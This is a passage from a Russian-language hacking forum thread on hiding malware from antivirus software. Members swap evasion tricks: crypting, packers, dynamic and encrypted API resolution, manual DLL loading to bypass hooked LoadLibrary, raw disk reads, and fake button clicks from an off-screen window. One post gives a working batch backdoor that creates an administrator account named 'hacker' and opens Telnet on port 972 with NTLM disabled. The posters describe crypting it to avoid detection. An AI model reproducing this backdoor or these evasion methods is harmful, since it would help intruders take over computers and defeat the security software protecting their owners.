|
Способы сокрытия от антивирусов
|
|
Волк-1024
|
Дата: Пятница, 30.12.2011, 01:05 | Сообщение # 26
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
|
Вроде. Замусоривание кода уже сейчас не канает. АВ строит логику приложения и если там очень много бесполезных прыжков и тому подобное. Она может наоборот насторожиться. Хотя могу тоже ошибаться. )
Лучше использовать комбинацию: Фейковые API + Динамич. получение функций + их шифрование.
---------------------------------------
Ой, фигню сморозил. Шифрование и дин. получ. функ несовместимы. Совместимы если только искать по имени функции, а не по хэшу.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Пятница, 30.12.2011, 01:12
|
| |
|
|
|
|
|
Android
|
Дата: Понедельник, 02.01.2012, 14:29 | Сообщение # 27
|
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
|
Ребята, а вы точно на Делфи пишете??? Может кто-то из вас смотрел в сторону KOL - довольно маленькие прогарммки получаются и кстати, стем же набором функций что и VCL палятся значительно меньше почему-то... |
| |
|
|
|
|
|
dolphin
|
Дата: Понедельник, 02.01.2012, 17:37 | Сообщение # 28
|
Администратор
Сообщений: 902
Статус: Offline
|
Так кол это же объектная библиотека а вирусам это зачем? Если только как альтернатива vcl. В троянце например ,если нужна визуалка, можно и на апи написать, в этом сложного особо нет. Так что  . А не палится потому что мало используют для вирусных целей.
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
Сообщение отредактировал dolphin - Понедельник, 02.01.2012, 18:29
|
| |
|
|
|
|
|
phl
|
Дата: Среда, 04.01.2012, 04:24 | Сообщение # 29
|
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
|
А у меня вопрос насчёт криптора, проводил я недавно эксперимент,для него использовал антивирусник drweb, вот код батника открывающего телнет на 972 порту:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Антивирусник сразу видит в нём вирус bat.Adduser.43, далее преобразую файл из bat в exe, с помощью программы bat to exe converter и криптую, всё
если проверить файл антивирусником вирус не определяется, думал отлично, но стоит запустить файл и он тут же блокируется и опять выдаёт вирус bat.Adduser.43, хотел бы узнать в чём здесь причина и реально ли это обойти
криптор и вирус во вложении
|
| |
|
|
|
|
|
phl
|
Дата: Воскресенье, 08.01.2012, 01:32 | Сообщение # 30
|
|
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
|
а уже сам понял, антивирус само добавление нового пользователя в систему с админскими правами и открытие порта воспринимает как подозрительное действие, другой вирус криптовал, норм, не палится |
| |
|
|
|
|
|
Волк-1024
|
Дата: Вторник, 10.01.2012, 23:57 | Сообщение # 31
|
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
|
Крипт не поможет. Ибо прога не конвертирует из bat в exe, а просто суёт bat в ресурсы exe файла. И при запуске извлекает и запускает его. 80% того, что bat файл после запуска можно обнаружить в темповой папке (если в бат не самоудалиться). Я не знаю как в bat to exe converter, но в Quick Batch File Compiler так всё и происходит. (((
P.S. лучше батник зашифровать, чем экзешник.
Pascal, C\C++, Assembler, Python
|
| |
|
|
|
|
|
kalinochkind
|
Дата: Среда, 11.01.2012, 19:22 | Сообщение # 32
|
Новичок
Зарегистрирован: 12.12.2011
Группа: Пользователи
Сообщений: 3
Статус: Offline
|
Можно пробовать Themidу... |
| |
|
|
|
|
|
XSPY
|
Дата: Среда, 11.01.2012, 19:57 | Сообщение # 33
|
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
|
если много подозрительных мест,то это не насторожит антивири,у которых нет "оценки опасности" программы.Хотя тогда у них юзаеться нечто другое.Например,в Авире проверяються состояния флагов и т.п,импорт,секии данных и прочее....
а вообще,стоить нуно и криптовать приложение так,как нравиться аверу.
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
|
|
|
|
|
phl
|
Дата: Воскресенье, 29.01.2012, 21:59 | Сообщение # 34
|
|
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
|
от антивирусов то как-нибудь можно спрятаться,но как обойти файрвол? |
| |
|
|
|
|
|
Волк-1024
|
Дата: Воскресенье, 29.01.2012, 22:51 | Сообщение # 35
|
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
|
Для каждего фаера свои методы...
Pascal, C\C++, Assembler, Python
|
| |
|
|
|
|
|
vvova15
|
Дата: Понедельник, 30.01.2012, 17:17 | Сообщение # 36
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
|
есть еще метод сырой загрузки dll.
суть заключается в том , чтобы вручную загрузить dll в адресное пространство, открыв длл-ку как бинарный файл, считав из pe-заголовка сколько нужно памяти, выделить ее,, загрузить туда заголовки и секции(простым компированием памяти), обработать релоки, распарсить таблицу импорта, найти в ней адрес нужной функции, и т.д.
в общем написать свои аналоги loadlibrary и getprocadress
ведь авири хукают loadlibrary из kernel32.dll и мы тем самым обойдем это и вызовем функцию незаметно для авиря.
проверял на vt - палева вообще 0
да и врятли такое будет палиться, хотя если только если ав будут хукать createfile после этого и если это длл-ка, то орать.
но мы тогда сделаем чтение файла через ioctl запросы к диску и парсинг mft(master file table) 
вот статейка, кому интересно http://slesh.name/?act=articles&subact=show&nid=12
ICQ 185-398
Сообщение отредактировал vvova15 - Понедельник, 30.01.2012, 17:18
|
| |
|
|
|
|
|
vvova15
|
Дата: Вторник, 31.01.2012, 10:19 | Сообщение # 37
|
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
|
да и еще метод:
создать окно за пределами экрана, кнопку на нем , написать обработчик, чтоб по клику на нее делалось палевное действие, и посылать сообщение о кликепо этой кнопке.
ведь авири наиболее подозрительно относятся к программам "без окон без дверей", которые работают не спрашивая юзера ни о чем. а так как бэ все честно, юзер сам кликнул по кнопке и авири пока не палят этот метод.
+ кончено же обфускация))(открытие несуществующих файлов между строками нужного кода, проверка невыполнимых условий, высов функций, которые что-то там делают полезное и т.д. )
ICQ 185-398
Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 10:19
|
| |
|
|
|
|
|
Волк-1024
|
Дата: Вторник, 31.01.2012, 14:52 | Сообщение # 38
|
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
|
Quote
создать окно за пределами экрана,
А не лучше ли так:
Code
Form1.Visible:=false;
?
И выйдет зверь размером в over 400кб 
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Вторник, 31.01.2012, 14:59
|
| |
|
|
|
|
|
vvova15
|
Дата: Вторник, 31.01.2012, 16:29 | Сообщение # 39
|
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
|
Quote
Form1.Visible:=false;
нет. http://msdn.microsoft.com/en-us/library/windows/desktop/ms632679 (v=vs.85).aspx
создаешь и регистрируешь класс окна, создаешь окно и описываешь цикл обработки сообщений
x и y в параметрах указываешь отриуательные или over 9000
ICQ 185-398
Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 16:30
|
| |
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Понедельник, 06.02.2012, 17:01 | Сообщение # 40
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Quote (Волк-1024)
Form1.Visible:=false;
...да согласен с "vvova15",ведь форма все равно остается видимой даже если Вы выставляете значение Visible:=false;
|
| |
|
|
|
|
|
Волк-1024
|
Дата: Понедельник, 06.02.2012, 17:25 | Сообщение # 41
|
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
|
xXxSh@dowxXx Ну или так
Code
CreateWindowEx(0, PChar('Win'), PChar('WinMin'), 0, X, Y, Width, Height, 0, 0, Hinstance, nil);
- Без разницы.
Окно будет формально создано.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Понедельник, 06.02.2012, 17:37
|
| |
|
|
|
